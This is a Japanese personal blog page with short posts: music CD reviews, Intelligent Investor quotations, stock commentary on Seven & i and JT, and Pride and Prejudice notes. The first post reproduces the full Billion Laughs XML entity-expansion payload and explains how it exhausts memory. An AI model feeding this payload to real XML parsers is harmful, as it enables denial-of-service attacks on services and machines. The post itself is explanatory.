作者別: rokujo

コメントする 投稿日: プログラミング, 未分類

Billion Laughs

Introducing Pythonに載っていた。次のXMLを読み込むと大抵のPCが落ちるか、動作不安定になる。

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

まずlolzエレメントが読み込まれ、これはlol9を参照している。しかしlol9は10個のlol8エレメントと定義されていて、さらにlol8は10個のlol7エレメントと定義されている。以下10回繰り返して、最後にlol1は10個の”lol”に変換される。10の9乗個の”lol”、すなわち3GBのメモリを消費する。シンプルかつ効果の高いDoS攻撃の一種だ。
lol(laughing out loud)、というのは日本語にすると(笑)と大体同じ意味だ。lolでは日本人になじみがないが、をに変えれば4GBの(笑)で画面が埋め尽くされる。この攻撃のウザさが良く分かるだろう。なおWikipediaによれば発祥は2003年、有名になったのは2008年らしいのでセキュリティ業界にはとっくに膾炙されている問題と思われる。なお手元で実行してみようと思ったらセキュリティソフトに “XML Bomb” と警告されて実行できなかった。

このエントリーをはてなブックマークに追加

コメントする 投稿日: <ワールドミュージック>, CDレビュー, 未分類

The Rough Guide to The Music of Portugal (1998)


★★★★★
ポルトガルはスペインと同様にイスラム化された歴史があるにもかかわらず、スペインほどイスラム的な要素は少ない。ギターを中心としたファドという民謡が多い。明るく大きく歌い上げる、しかし哀愁を帯びた歌。イタリアと雰囲気が似ている。2曲目DULCE PONTES – FADO DA SINA が聞かせてくれる。10曲目LENDAS & MITOS – BARQUINHA DO MARはまさかのロックだが、なかなかアツい仕上がりとなっていてグッド。11曲目ANABELA – AVENIDASは随分と現代風だがこれもよい。地中海的ダラり曲だ。新旧ハズレの曲が少なく同シリーズの中でも上位の作品。

このエントリーをはてなブックマークに追加

コメントする 投稿日: quote unquote, 未分類

becoming more familiar with a subject does not significantly reduce people’s tendency to exaggerate how much they actually know about it.

Psychologists led by Baruch Fischhoff of Carnegie Mellon University have documented a disturbing fact: becoming more familiar with a subject does not significantly reduce people’s tendency to exaggerate how much they actually know about it. That’s why “investing in what you know” can be so dangerous; the more you know going in, the less likely you are to probe a stock for weaknesses. This pernicious form of overconfidence is called “home bias,” or the habit of sticking to what is already familiar:
(略)
In short, familiarity breeds complacency. On the TV news, isn’t it always the neighbor or the best friend or the parent of the criminal who says in a shocked voice, “He was such a nice guy”? That’s because whenever we are too close to someone or something, we take our beliefs for granted, instead of questioning them as we do when we confront something more remote. The more familiar a stock is, the more likely it is to turn a defensive investor into a lazy one who thinks there’s no need to do any homework. Don’t let that happen to you.
―The Intelligent Investor, Commentary of Chapter 5

持っている物を高く評価してしまう効果:endowment effectに加えて、よく知っている物事を高く評価してしまう効果:home biasが登場した。良く知っていることはむしろ盲目につながる。気を付けないといけない。ともに人間の虚栄をよく突いている概念だな。

このエントリーをはてなブックマークに追加

コメントする 投稿日: <ジャズ>, CDレビュー, 未分類

Anthony Braxton – Six Monk’s Compositions (1987)


★★★★★
相変わらずインプロでピロピロしまくってるけれど、このアルバムはベース、ピアノ、ドラムとフルで稼働しているため、彼のピロピロがうまく吸収され、絶妙な味付けに昇華されている。ラーメンで例えると、もやしがタワーになっていて見た目迫力があるけれど、麺とスープが正統派の味付けであるために全体として美味しいラーメンである、という感じだ。Four In Oneが一番の当たり曲。

このエントリーをはてなブックマークに追加

コメントする 投稿日: 未分類, 株・企業研究

株価は2-3年先の成長を織り込み済みと言うが

嘘だと思った。
今日読んでいる資料は、3382 セブン&アイホールディングスの2013年度の事業概要。これの4ページ目に、過去10年間の業績の変遷が書いてある。2009年に大きく底を打っていることが分かる。その後2010年には2007年度の水準にV字回復、そのまま2011年には過去最高益を叩きだしている。しかしチャートを見ると、2009年12月に最低額を付けるのは分かるが、そのあと何故か2010年8〜10月にさらに低迷する。株価が上昇基調に乗るのは2012年に入ってから、なのだ。
2009年1-3月で30%も下げているのは下方修正でも発表されていたのかもしれないが、2008年中にその兆候は明らかになっているはずだ。
つまり株価は2-3年先の成長なんぞ織り込んでいない。目先の業績につられて乱高下するだけだ。成長に関してはむしろ、1年遅れてついてくる。2010年度の決算を見れば、ふつう2011年4月にはもっと上がっているはずだ。マーケットは業績を予測できない。こんな大会社ともなれば、価格を上下させるのは大口の機関しかいない。彼らもまた失うことを恐れ、得るタイミングを先延ばしにするのだ。少し安心した。
また、2008年3月、10月に大きな下ヒゲが現れている。いずれも25%(2週間), 30%(1週間!)と強烈な下ヒゲであり、これを利用すれば短期間で大幅な利益を得ることができる。ただしそのあとの2009年1月の20%下げは本物で、その後2013年まで復活しないので、ギャンブルには違いないが。。
2012年時点でセブンアイの売上高規模はアマゾンに次ぐ世界17位なのね。でかいね。イオンは世界13位。なお、この数字はセブンイレブンを含んでない、イトーヨーカドー等のみの数字らしい。含めば世界2位だ。

このエントリーをはてなブックマークに追加

コメントする 投稿日: <ジャズ>, CDレビュー, 未分類

Kenny Dorham – Quiet Kenny(1959)


★★★★★
1曲目のイントロがすごい!!ベースのPaul Chambersさんの技が光る、かっちょいいーー。イメージとしては、川崎の港沿いのうらびれたスナック街。いい意味で気が抜けているトランペットの音のせいだ。続く2曲目My Idealも悶絶するほどあったかい名曲。派手でも奇抜でもないが、何度も繰り返し聞きたい1枚。

このエントリーをはてなブックマークに追加

コメントする 投稿日: 未分類, 株・企業研究

JT強すぎ

工場がどんどん閉鎖され、桃の天然水からも撤退する、などと弱体化しているような気がするJTだが、全くそんなことはなかった。
アニュアルレポート | JT ウェブサイト
まずアニュアルレポートが158ページもある。さすが巨大企業。これによると国内市場・海外市場ともに、販売本数は漸減している。しかし利益は確実に増加している。

CAGR 13.2 %
過去 5 年間( FY2010 〜 FY2012 :営業利益、 2013 年 1 ─ 12 月、 2014 年 1 ─ 12
月:調整後営業利益)の年平均成長率
CAGR 31 %
一株当たり配当金の過去 5 年間の年平均成長率

収益増のからくりは、単価増。

2013 年の調査によると、世界全体の総需要は、中国を除けば、
わずかながらも減少傾向にあります * 。しかしながら、たばこ
産業の構造は強固であり、厳しい環境下においても、主に製
品価格の上昇により、全体としての売上収益は成長を続けて
います。この総需要の減少と売上収益の増加傾向は、今後も
継続するものと予想されます * 。

独占性と中毒性がこの会社の本質だ。ジャンキーを食い物にして、彼らが抗うことのできないゆったりとした値上げによって成長していくというモデルだ。価格支配ができる最大の利点を生かし、営業利益率27.5%を誇る。国内の利益率はわずかながら縮小傾向だが、海外市場での収益は飛躍的に伸びている。なお来期は、円安のため-11.4%と大幅に営業利益が落ちる予定。海外展開する企業の辛いところだ。
昨今の規制強化については、私はタバコが嫌いなのでよいが、JTにとっては飯の食い上げになるのでたまったものではない。当然、批判的な記述が目立つ。

近年、製品そのものに対する規制が高まっています。プレー
ンパッケージング規制の導入に加え、各国規制当局は、たば
この規制に関する世界保健機関枠組条約のガイドラインに
則り、たばこの原材料やたばこの煙中成分に対する規制を、
より積極的に施行しつつあります。また、欧州では、欧州た
ばこ製品指令の改定を受けて、警告表示面積の拡大、製品の
個装形状の制限や添加物が禁止されることになり、 EU 加盟
国は 2017 年 5 月までの対応を求められています。このよう
に、個々のたばこ製品の特徴を排除しようとする規制は、多
様化するお客様の需要に対応するための企業間の公正な競
争を阻害する可能性があります。また、こうした特徴のな
い製品は、偽造を容易にし、密輸品の摘発を困難にするため、
不法取引が増加します。

記述があからさますぎて政府と企業の対決という軸が見えてきそうだが、税収減につながる規制強化をなぜ各国が推進するのかわからない。税収減と医療費増を天秤に掛けると、医療費増の方が痛いってことなのかな?
海外展開の所の画像。フランスの煙草の警告はすごいですね。

「吸うと死ぬ」と書いてある。

今日までのところ、当社グループは喫煙と健康に関する訴
訟において一度も敗訴しておらず、また和解金を支払った
こともありません

なんで!?
あとこのアニュアルレポート、たばこの利点も欠点も書いてないね。なんで!?

このエントリーをはてなブックマークに追加

コメントする 投稿日: 外国語, 日記, 未分類

Pride And Prejudice 1-5 覚書

登場人物が多くて混乱しそうなので、自分用にまとめる。
あらすじ
時は18世紀、イギリスの片田舎ロングボーンにて5人姉妹を抱えるベネット家の近所に金持ちの独身イケメン・ビングリーが引っ越してきた。ベネット家のお気楽長女ジェーンは彼に見初められるが・・・?
登場人物
・ベネット家
ベネット夫人…頭おかしい。うるさい。娘を結婚させること以外の思想は存在しない。ジェーンがビングリーに気に入られたことを夫にも他人にも自慢しまくり。LibriVoxのドラマ版の話者が話すの早いしウザくてはまり役。顔がいいジェーンを贔屓している。
ベネット氏…皮肉屋親父。知性があるがベネット夫人はアホなので会話ができない。なぜ結婚したのか。エリザベスを贔屓している。
ジェーン…長女。美女。悩みが無い。他人はみんないい人だと思っている。物事をポジティブにしか見られない。
エリザベス…次女。主人公?中立的な視点を持つことができる。おそらく親父譲り。ダーシーに冷たい扱いを受けるが気にしない。ジェーンに皮肉を言うが通用しない。イライザ、リジーと呼ばれ方が一定しない。
メアリー…三女。本好きだが読んだ内容を現実に適用できる知性が足りないようで、すでに2回もはずしている。序盤で親父に暗に馬鹿にされている。
キティ…四女。詳細不明。
リディア…五女。詳細不明。
・ビングリー家
ビングリー…お坊ちゃん。イケメン。金持ち。アホではないが、5姉妹に囲まれて舞い上がるやや心配な人物。ジェーンに一目惚れ。ダーシー大好き。
ビングリー姉(3人?)…金持ち。詳細不明。
ダーシー…ビングリーの友人。イケメン。金持ち。少女漫画に必ず出てくるいけ好かない野郎。
・ルーカス家
ベネット家のお隣さん。長女は普通の人、次女はお転婆でエリザベスの友達。

古典であるが非常に読みやすく面白い。もし現代に作られたなら間違いなく少女漫画になっている題材であり、ダーシー×ビングリーで有明が盛り上がっているだろう。アゴが尖っていて悪そうな目つきをするいけ好かない野郎が活躍するお約束に従うなら、この後ダーシー・エリザベスの関係で一悶着あると思われる。なお、この小説はチャプター61まである。先が長い。まだ序盤で、主要登場人物が対峙したところまでであり、主題の高慢(pride)についても「ダーシーは金持ちだから高慢なのはしょうがないよね」くらいしか現れていない。続きに期待。

このエントリーをはてなブックマークに追加

コメントする 投稿日: quote unquote, 未分類

直接株とは関係ないけれど

The average doctor may be more likely than the average widow to elect to become an enterprising investor, and he is perhaps more likely to succeed in the undertaking. He has one important handicap, however―the fact that he has less time available to give to his investment education and to the administration of his funds. In fact, medical men have been notoriously unsuccessful in their security dealings. The reason for this is that they usually have an ample confidence in their own intelligence and a strong desire to make a good return on their money, without the realization that to do so successfully requires both considerable attention to the matter and something of a professional approach to security values.
―The Intelligent Investor, Chapter 5

アメリカの医者は自信を持ちすぎてて失敗しやすいから保守的に運用しろ、とのこと。エリートって日本もアメリカも同じなんだねぇ。驚いた。

このエントリーをはてなブックマークに追加